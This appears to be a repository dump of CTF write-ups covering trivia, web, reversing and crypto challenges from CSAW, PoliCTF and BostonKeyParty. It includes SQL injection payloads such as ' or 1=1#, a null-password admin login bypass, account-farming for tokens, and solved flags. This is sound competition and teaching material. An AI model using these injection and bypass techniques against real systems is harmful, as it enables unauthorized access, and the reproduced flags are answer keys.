account as ```flag{f7da7636727524d8681ab0d2a072d663}``` 16 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Trivia/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | #Trivia_All_Of_Them 3 | 4 | **Category:** Trivia 5 | **Points:** 10 each 6 | **Description:** trivia questions (nerd stuff) 7 | 8 | 9 | ##Write-up 10 | All the trivia challenges were solved quickly by googling around. We tried to inlude links to good resources about each topic. 11 | 12 | 13 | 14 | Trivia 1 15 | -------- 16 | Q: This family of malware has gained notoriety after anti-virus and threat intelligence companies claimed that it was being used by several Chinese military groups. 17 | 18 | A: plugX , took a little trial and error since there are so many malware families connected to Chinese hacking groups. More information about plugx can be found at [this blackhat talk](https://www.blackhat.com/docs/asia-14/materials/Haruyama/Asia-14-Haruyama-I-Know-You-Want-Me-Unplugging-PlugX.pdf). 19 | 20 | Trivia 2 21 | -------- 22 | Q: No More Free __! 23 | 24 | A: Bugs, It's a meme starting at security conference CanSecWest, [Trail of Bits' website](http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/) 25 | 26 | Trivia 3 27 | -------- 28 | Q: This mode on x86 is generally referred to as ring -2. 29 | 30 | A: System Management Mode , this was from the best talk of BlackHat 2015 by Christopher Domas. It blew everyone's mind how you can use System Management Mode's memory space to create privilege escalation on 100,000's of Intel based devices. You can read more about it at [blackHat.com](https://www.blackhat.com/images/page-graphics-usa-15/us-15-whitepaper.png) 31 | 32 | Trivia 4 33 | -------- 34 | Q: This vulnerability occurs when the incorrect timing/sequence of events may cause a bug. 35 | 36 | A: Race Condition, this is a common problem with single threaded apps or those that are multithreaded but share common objects/files/cookies/database values/or whatever.. more detail can be found on [wikipedia](https://en.wikipedia.org/wiki/Race_condition) 37 | 38 | Trivia 5 39 | -------- 40 | Q: On Windows, loading a library and having it's code run in another process is called _ . 41 | 42 | A: DLL Injection, here's a [tutorial](http://resources.infosecinstitute.com/api-hooking-and-dll-injection-on-windows/) 43 | 44 | Trivia 6 45 | -------- 46 | Q: This Pentesting expert supplied HBO's Silicon Valley with technical advice in season 2. The flag is his twitter handle. 47 | 48 | A: A little googling on a cell phone while looking at other challenges found this one. Rob Fuller [Mubix!](https://twitter.com/mubix) 49 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/bid.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/bid.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/compass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/compass.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/flag.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/hidden.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/hidden.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/home.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/noop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/noop.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/register.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/register.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/stairs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/stairs.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/tokens.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/tokens.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Images/tokens_after.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/K_-Stairs/Images/tokens_after.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/K_-Stairs/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | #K_{Stairs} 3 | 4 | **Category:** Web 5 | **Points:** 100 6 | **Description:** 7 | 8 | http://54.152.84.91 9 | 10 | ##Write-up 11 | Hitting the site, we are welcomed with the following: 12 | 13 | ![Image of site] 14 | (./Images/home.png) 15 | 16 | Immediately we register and start looking around. 17 | 18 | ![Image of registration] 19 | (./Images/register.png) 20 | 21 | So, straight off the bat we notice that we were given 3 tokens for registering to play and there appears to be DLC content available to help us in our conquest. After a lot of playing around and throwing things (the site was very slow and buggy at times), we noticed that if you register and then just logout and re-register it aggregates your tokens. 22 | 23 | ![Image of tokens] 24 | (./Images/tokens.png) 25 | 26 | During our recon we also noticed a hidden compass that said it costs 100 tokens. 27 | 28 | ![Image of hidden compass] 29 | (./Images/hidden.png) 30 | 31 | We wasted a lot of time here trying to buy this upgraded compass by changing the ```bid``` parameter to ```4```, as we thought perhaps it would give us an upper hand while actually playing the game. No matter what we did we were always greeted with the ```nO-oP``` message. 32 | 33 | ![Image of bid] 34 | (./Images/bid.png) 35 | 36 | ![Image of nO-oP] 37 | (./Images/noop.png) 38 | 39 | Before you comment on the number of tokens being shown above while trying to purchase a ```100``` compass, these images were taken after the fact. We had closer to ```200``` tokens available while testing and were never able to purchase this item. So moving back to collecting tokens. After we finished registering enough users, we went ahead and purchased the ```10``` token compass, a bunch of food, and headed off on our quest. 40 | 41 | ![Image of tokens_after] 42 | (./Images/tokens_after.png) 43 | 44 | ![Image of compass] 45 | (./Images/compass.png) 46 | 47 | The compass basically was boolean in nature. It would only tell you if you were going the right or wrong direction. We took the approach of heading one direction until it tells us that that is no longer the correct direction and then turn and head the way the compass tells us. Eventually we wind up finding a staircase. 48 | 49 | ![Image of stairs] 50 | (./Images/stairs.png) 51 | 52 | Heading up the stairs kills us, but only after revealing the flag. 53 | 54 | ![Image of flag] 55 | (./Images/flag.png) 56 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/achievement.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/achievement.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/empty.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/empty.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/flag.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/grass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/grass.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/intro.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/intro.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/username.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Web/Lawn-Care-Simulator/Images/username.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Web/Lawn-Care-Simulator/Readme.md: -------------------------------------------------------------------------------- 1 | #Lawn Care Simulator 2 | 3 | **Category:** Web 4 | **Points:** 200 5 | **Description:** 6 | 7 | http://54.165.252.74:8089/ 8 | 9 | ##Write-up 10 | Hitting the site, we are welcomed with the following site: 11 | 12 | ![Image of site] 13 | (./Images/intro.png) 14 | 15 | After getting nowhere with the standard web attacks I started to mess with the grass feature which grew the grass little by little and giving "achievements" every so often for wasting your time. 16 | 17 | ![Image of achievement] 18 | (./Images/achievement.png) 19 | 20 | Just for fun I modified the grass to grow quickly by calling the ```grow()``` function muliple times per click. 21 | 22 | ![Image of grass] 23 | (./Images/grass.png) 24 | 25 | Ok, back to the challenge. Messing with the username/password fields I noticed that there was some client-side validation to ensure that values weren't empty upon submission. 26 | 27 | ![Image of username] 28 | (./Images/username.png) 29 | 30 | Using burp I tried a few different tests with null values like ```null:null```, ```test:null```, and finally ```admin:null```. The latter produced: 31 | 32 | ![Image of empty] 33 | (./Images/empty.png) 34 | 35 | ![Image of flag] 36 | (./Images/flag.png) 37 | -------------------------------------------------------------------------------- /2015/PoliCTF/Grab-Bag/Hard-Interview/IP.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Grab-Bag/Hard-Interview/IP.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Grab-Bag/Hard-Interview/Readme.md: -------------------------------------------------------------------------------- 1 | #Hard Interview 2 | 3 | **Category:** Grab Bag 4 | **Points:** 50 5 | **Description:** 6 | 7 | > interview.polictf.it:80 8 | 9 | ##Write-up 10 | 11 | >The first thing we did was netcat to the above address:port and got the following screen: 12 | > 13 | ![Image of Hard Interview hint] 14 | (./hint.tiff) 15 | 16 | >The description for the challenge is basically a quote from the movie Swordfish and we are logged in with fish@sword. The official hint is that the host is a "not so easily reachable IP" and the user is "THE username", both of which are slightly vague. 17 | 18 | >After try a few different combinations of usernames and hosts I decided to go lookup the movie clips surrounding the scene that had been quoted. The first item that struck me was the following: 19 | > 20 | ![Image of Hard Interview hint] 21 | (./IP.tiff) 22 | 23 | >The "not so easily reachable IP" of 312.5.125.233 fit the bill and when submitted the system stopped complaining about the host. 24 | 25 | >Having found the host sytem, I stayed in the same area of the movie and looked for any possible usernames that would have been submitted. It didn't take long (and probably shouldn't have taken the movie) to land on the following: 26 | > 27 | ![Image of Hard Interview hint] 28 | (./user.tiff) 29 | 30 | >Using ssh from the options and submitting the above values reveals the flag. 31 | > 32 | >``` 33 | >fish@sword:~$ ssh admin@312.5.125.233 34 | > flag{H4ll3_B3rry's_t0pl3ss_sc3n3_w4s_4ls0_n0t4bl3} 35 | >fish@sword:~$ 36 | >``` 37 | 38 | -------------------------------------------------------------------------------- /2015/PoliCTF/Grab-Bag/Hard-Interview/hint.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Grab-Bag/Hard-Interview/hint.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Grab-Bag/Hard-Interview/user.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Grab-Bag/Hard-Interview/user.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Reversing/Crack-Me-If-You-Can/Readme.md: -------------------------------------------------------------------------------- 1 | #Crack Me If You Can 2 | 3 | **Category:** Reversing 4 | **Points:** 100 5 | **Description:** 6 | 7 | > John bets nobody can find the passphrase to login! 8 | 9 | > GPG key: viphHowrirOmbugTudIbavMeuhacyet 10 | 11 | > [Crack Me If You Can](crack-me-if-you-can_d4e396383e3f64ec7698efaf42f7f32b.tar.gz.gpg) 12 | 13 | ##Write-up 14 | > To start, we are given an apk to reverse. The first thing I did was attempt to decompile the code. To do this I used a few different tools. The first thing we need to do is unzip the apk into a dex file. After that we can use dex2jar to convert this into a jar file. Finally, we can use luyten to open the jar and inspect the code. 15 | 16 | >``` 17 | >$ unzip crack-me-if-you-can.apk classes.dex 18 | > Archive: crack-me-if-you-can.apk 19 | > inflating: classes.dex 20 | >$ ~/dex2jar-0.0.9.15/dex2jar.sh classes.dex 21 | > this cmd is deprecated, use the d2j-dex2jar if possible 22 | > dex2jar version: translator-0.0.9.15 23 | > dex2jar classes.dex -> classes_dex2jar.jar 24 | > Done. 25 | >$ java -jar ~/luyten-0.4.3/luyten-0.4.3.jar classes_dex2jar.jar 26 | >``` 27 | > 28 | ![Image of luyten] 29 | (./luyten.tiff) 30 | > 31 | > The first thing I noticed in the it.polictf2015 package was the string 32 | > 33 | >``` 34 | > flagging{It_cannot_be_easier_than_this} 35 | >``` 36 | > 37 | > I tried this with the correct flag{.*} format but it didn't work. After looking through the layers of classes, all of which had a.b, b.c, b.d, c.a style structures I landed on the following chunk of java. 38 | > 39 | >```java 40 | >private boolean a(final String s) { 41 | > if (s.equals(c.a(it.polictf2015.b.a(it.polictf2015.b.b(it.polictf2015.b.c(it.polictf2015.b.d(it.polictf2015.b.g(it.polictf2015.b.h(it.polictf2015.b.e(it.polictf2015.b.f(it.polictf2015.b.i(c.c(c.b(c.d(this.getString(2131492920)))))))))))))))) { 42 | > Toast.makeText(this.getApplicationContext(), (CharSequence)this.getString(2131492924), 1).show(); 43 | > return true; 44 | > } 45 | > return false; 46 | > } 47 | >``` 48 | > This looks promising, but we need to find out what the following string is. 49 | >```java 50 | > this.getString(2131492920) 51 | >``` 52 | > 53 | > Already having the android-sdk installed, I went into the build-tools directory and grepped the output from aapt looking for the hex representation of the string reference. 54 | > 55 | >``` 56 | >$ ./aapt d --values resources ~/Dropbox/crack-me-if-you-can.apk | grep 0x7f0c0038 57 | > spec resource 0x7f0c0038 it.polictf2015:string/àè: flags=0x00000000 58 | > resource 0x7f0c0038 it.polictf2015:string/àè: t=0x03 d=0x0000017b (s=0x0008 r=0x00) 59 | >``` 60 | > 61 | > We can see that we got a hit on the it.polictf2015:string/àè string. Now to get the strings.xml file. For this, we'll use apktool to open up the apk. 62 | > 63 | >``` 64 | >$ java -jar apktool_2.0.0.jar d ~/Dropbox/crack-me-if-you-can.apk 65 | >I: Using Apktool 2.0.0 on crack-me-if-you-can.apk 66 | >I: Loading resource table... 67 | >I: Decoding AndroidManifest.xml with resources... 68 | >I: Loading resource table from file: /Users/haylesr/Library/apktool/framework/1.apk 69 | >I: Regular manifest package... 70 | >I: Decoding file-resources... 71 | >I: Decoding values */* XMLs... 72 | >I: Baksmaling classes.dex... 73 | >I: Copying assets and libs... 74 | >I: Copying unknown files... 75 | >I: Copying original files... 76 | >``` 77 | > 78 | > In the res/values directory we find strings.xml. Below is a snippet with the important stuff. 79 | > 80 | >```xml 81 | > 82 | > 83 | > Crack me! 84 | > Allow Ad to store image in Picture gallery? 85 | > Save image 86 | > Buy with Google 87 | > Incorrect! 88 | > [[c%l][c{g}[%{%Mc%spdgj=]T%aat%=O%bRu%sc]c%ti[o%n=Wcs%=No[t=T][hct%=buga[d=As%=W]e=T%ho[u%[%g]h%t[%}% 89 | > [[c%l][c{g}[%{%Mc%spdggfdj=]T%aat%=O%bRu%sc]c%ti[o[t=T][hct%=budsga[d=As%=W]e=T%ho[u%[%g]h%t[%}%T[]e3 90 | > Your device looks good :) 91 | > Empty! 92 | > Good to go! =) 93 | > "Nice emulator, I'm watching you ;)" 94 | > Hello! 95 | > 96 | >``` 97 | > 98 | > We see our string reference matches up and we are left with the following: 99 | > 100 | >``` 101 | > [[c%l][c{g}[%{%Mc%spdggfdj=]T%aat%=O%bRu%sc]c%ti[o[t=T][hct%=budsga[d=As%=W]e=T%ho[u%[%g]h%t[%}%T[]e3 102 | >``` 103 | > 104 | > I turned to python to recreate the b.java and c.java that we were able to see using the luyten tool. These classes basically just did a bunch of replacements on a given String value. 105 | 106 | >```python 107 | >def ca(text): 108 | > return text.replace("aa","ca") 109 | >def cb(text): 110 | > return text.replace("aat","his") 111 | >def cc(text): 112 | > return text.replace("buga","Goo") 113 | >def cd(text): 114 | > return text.replace("spdgj","yb%e") 115 | >def ba(text): 116 | > return text.replace("c","a") 117 | >def bb(text): 118 | > return text.replace("%","") 119 | >def bc(text): 120 | > return text.replace("[","") 121 | >def bd(text): 122 | > return text.replace("]","") 123 | >def be(text): 124 | > return text.replace("\\{","") 125 | >def bf(text): 126 | > return text.replace("\\}","") 127 | >def bg(text): 128 | > return text.replace("c","f") 129 | >def bh(text): 130 | > return text.replace("R","f") 131 | >def bi(text): 132 | > return text.replace("=","_") 133 | > 134 | >flag="[[c%l][c{g}[%{%Mc%spdgj=]T%aat%=O%bRu%sc]c%ti[o%n=Wcs%=No[t=T][hct%=buga[d=As%=W]e=T%ho[u%[%g]h%t[%}%" 135 | >print ca(ba(bb(bc(bd(bg(bh(be(bf(bi(cc(cb(cd(flag))))))))))))) 136 | >``` 137 | > 138 | > Running this code produced the following: 139 | > 140 | >``` 141 | >$ python ~/Dropbox/crackme.py 142 | > flf{g}{Mfybe_This_Obfusfftion_Wfs_Not_Thft_Good_As_We_Thought} 143 | >``` 144 | > 145 | > Bravo! We got the flag, but with some obvious mistakes. I'm sure I screwed up my python somewhere, but the flag is close enough that we can translate it to the correct value. I never went back to find the mistake. We submitted the flag and moved on. 146 | > 147 | >``` 148 | > flag{Maybe_This_Obfuscation_Was_Not_That_Good_As_We_Thought} 149 | >``` 150 | -------------------------------------------------------------------------------- /2015/PoliCTF/Reversing/Crack-Me-If-You-Can/crack-me-if-you-can_d4e396383e3f64ec7698efaf42f7f32b.tar.gz.gpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Reversing/Crack-Me-If-You-Can/crack-me-if-you-can_d4e396383e3f64ec7698efaf42f7f32b.tar.gz.gpg -------------------------------------------------------------------------------- /2015/PoliCTF/Reversing/Crack-Me-If-You-Can/crackme.py: -------------------------------------------------------------------------------- 1 | def ca(text): 2 | return text.replace("aa","ca") 3 | 4 | def cb(text): 5 | return text.replace("aat","his") 6 | 7 | def cc(text): 8 | return text.replace("buga","Goo") 9 | 10 | def cd(text): 11 | return text.replace("spdgj","yb%e") 12 | 13 | def ba(text): 14 | return text.replace("c","a") 15 | 16 | def bb(text): 17 | return text.replace("%","") 18 | 19 | def bc(text): 20 | return text.replace("[","") 21 | 22 | def bd(text): 23 | return text.replace("]","") 24 | 25 | def be(text): 26 | return text.replace("\\{","") 27 | 28 | def bf(text): 29 | return text.replace("\\}","") 30 | 31 | def bg(text): 32 | return text.replace("c","f") 33 | 34 | def bh(text): 35 | return text.replace("R","f") 36 | 37 | def bi(text): 38 | return text.replace("=","_") 39 | 40 | flag="[[c%l][c{g}[%{%Mc%spdgj=]T%aat%=O%bRu%sc]c%ti[o%n=Wcs%=No[t=T][hct%=buga[d=As%=W]e=T%ho[u%[%g]h%t[%}%" 41 | 42 | print ca(ba(bb(bc(bd(bg(bh(be(bf(bi(cc(cb(cd(flag))))))))))))) -------------------------------------------------------------------------------- /2015/PoliCTF/Reversing/Crack-Me-If-You-Can/luyten.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Reversing/Crack-Me-If-You-Can/luyten.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/9.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Referee/9.jpg -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/Readme.md: -------------------------------------------------------------------------------- 1 | #John the Referee 2 | 3 | **Category:** Web 4 | **Points:** 150 5 | **Description:** 6 | 7 | > John is one of the most famous referee and security experts in the world. He loves encryption and his referee uniforms. You can find them on his online store. Unfortuneately his best uniform is not on sale for anyone. I know that it is available only on invitation. I want that uniform! 8 | 9 | > referee.polictf.it 10 | 11 | ##Write-up 12 | > Full disclosure, we only got this challenge after that CTF had ended, but our approach was slightly different in the end and I decided to write it up anyway. 13 | > 14 | > Starting out we were greeted with the main page in which we can see an array of uniforms. 15 | > 16 | >![Image of main] 17 | (./main.JPG) 18 | > 19 | > There were really only two different areas to look at.> 20 | > 1) You could click on a uniform and you were brought to something similiar to the following (depending on what uniform you chose). 21 | >``` 22 | > http://referee.polictf.it/uniform/3 23 | >``` 24 | > 2) You could search or a uniform where you were brought to a page with a hash like value in the path. Single quotes and other characters we also escaped when submitted. 25 | > 26 | ![Image of normal] 27 | (./normal.JPG) 28 | > 29 | > Looking at the first option first, we used burp intruder to loop through uniform values looking for anything that didn't show up on the main page. What we found was that only 1-8 and 10 had uniforms. Obviously #9 stuck out and seemed to be the goal. We then turned to the static images where we were able to see the 9th uniform. 30 | > 31 | ![Image of 9] 32 | (./9.jpg) 33 | > 34 | > Now that we have confirmed that this was our target we needed to find a way to get to that uniform. 35 | > 36 | > Going back to option two, we messed around with the search page and were able to figure out that you could manipulate the first character in the search box by changing the begining of the hash like value in the path. Again, being honest, this is where we stopped. Having said that, you can use that information to edit the escape character for SQLi payloads. 37 | > 38 | > Starting with ```' or 1=1#``` in an attempt to return all uniforms we see that we had a valid query in that data returned, but it looks like we are only getting the first uniform. 39 | > 40 | ![Image of or logic] 41 | (./or_logic.JPG) 42 | > 43 | > We then tried to get a ```UNION SELECT``` SQLi to work and were able to determine that only one column was being selected, however, we never were able to get the full statement to execute. With that being said, we can just continue with the ```' or 1=1#``` query, but select which row we want to actually be displayed using ```' or 1=1 limit 1 offset 9#```. This is basically saying select everything from the database but only return the 9th record. This returns the uniform seen at ```http://referee.polictf.it/uniform/10```, so we must be off by one. Changing the query yields: 44 | > 45 | ![Image of flag] 46 | (./flag.JPG) 47 | -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/flag.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Referee/flag.JPG -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/main.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Referee/main.JPG -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/normal.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Referee/normal.JPG -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Referee/or_logic.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Referee/or_logic.JPG -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/3.jpg -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/Crop.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/Crop.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/QR.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/QR.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/Readme.md: -------------------------------------------------------------------------------- 1 | #John the Traveller 2 | 3 | **Category:** Web 4 | **Points:** 100 5 | **Description:** 6 | 7 | > Holidays are here! But John still hasn't decided where to spend them and time is running out: flights are overbooked and prices are rising every second. Fortunately, John just discovered a website where he can book last second flight to all the European capital; however, there's no time to waste, so he just grabs his suitcase and thanks to his new smartphone he looks the city of his choice up while rushing to the airport. There he goes! Flight is booked so... hauskaa lomaa! 8 | 9 | > traveller.polictf.it 10 | 11 | ##Write-up 12 | > The first clue came at the end of the description. Google translate tells us that hauskaa lomaa is Finnish for happy vacation. A quick lookup of European capitals shows Helsinki as the capital of Finland. 13 | > 14 | > Heading to the site we are greeted with the following page: 15 | > 16 | >![Image of traveller] 17 | (./Traveller.tiff) 18 | > 19 | > After searching for Helsinki we get a list of possible flights that change each time we search. We did notice that the currency for Helsinki was in ```px```, whereas the rest of the options seemed to be ```EUR```. That should have stood out, but we missed it at first. After poking around the site we noticed that if you zoomed in on the image of Venice that there appeared to be a broken up QR code in it. We originally attempted to use Gimp to pull the blocks out, but none of us were that experienced with it and it was too sloppy to piece back together. We ended up finding [ImageSplitter.net](imagesplitter.net) which turned out to be perfect. 20 | > 21 | >![Image of venice] 22 | (./Venice.tiff) 23 | > 24 | > We went through the image methodically cropping out 100 x 100 blocks of QR code. 25 | > 26 | >![Image of block] 27 | (./block.png) 28 | > 29 | > After getting what we thought was all 36 blocks, we started the painfull process of putting the puzzle back together. We had a few duplicated blocks and ended up missing one completely, but got the final QR code back. 30 | > 31 | >![Image of QR code] 32 | (./QR.tiff) 33 | > 34 | > It took a few iterations to get the blocks placed correctly, but when we did we were able to scan the QR code even with the missing block and get our flag. 35 | > 36 | >![Image of flag] 37 | (./flag.tiff) 38 | > 39 | > It turns out that a much much easier way to do this would have been to use the Chrome dev tools to set the screen size to a specified pixel height and width (i.e. Helsinki flight currency px). Getting the parameters lined up with the flight costs renders our QR code in all of it's glory with much less pain. Lesson learned. 40 | > 41 | >![Image of Chrome dev tools] 42 | (./px.tiff) 43 | -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/Traveller.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/Traveller.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/Venice.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/Venice.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/block.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/block.png -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/flag.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/flag.tiff -------------------------------------------------------------------------------- /2015/PoliCTF/Web/John-the-Traveller/px.tiff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/PoliCTF/Web/John-the-Traveller/px.tiff -------------------------------------------------------------------------------- /2016/BostonKeyParty/Crypto/des-ofb/Images/601px-OFB_decryption.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2016/BostonKeyParty/Crypto/des-ofb/Images/601px-OFB_decryption.png -------------------------------------------------------------------------------- /2016/BostonKeyParty/Crypto/des-ofb/Readme.md: -------------------------------------------------------------------------------- 1 | #des-ofb 2 | 3 | **Category:** Crypto 4 | **Points:** 2 5 | **Description:** 6 | 7 | Decrypt the message, find the flag, and then marvel at how broken everything is. 8 | 9 | ##Write-up 10 | To start we are provided with two items, a copy of the ciphertext and the following python script. 11 | 12 | ```python 13 | from Crypto.Cipher import DES 14 | 15 | f = open('key.txt', 'r') 16 | key_hex = f.readline()[:-1] # discard newline 17 | f.close() 18 | KEY = key_hex.decode("hex") 19 | IV = '13245678' 20 | a = DES.new(KEY, DES.MODE_OFB, IV) 21 | 22 | f = open('plaintext', 'r') 23 | plaintext = f.read() 24 | f.close() 25 | 26 | ciphertext = a.encrypt(plaintext) 27 | f = open('ciphertext', 'w') 28 | f.write(ciphertext) 29 | f.close() 30 | ``` 31 | 32 | 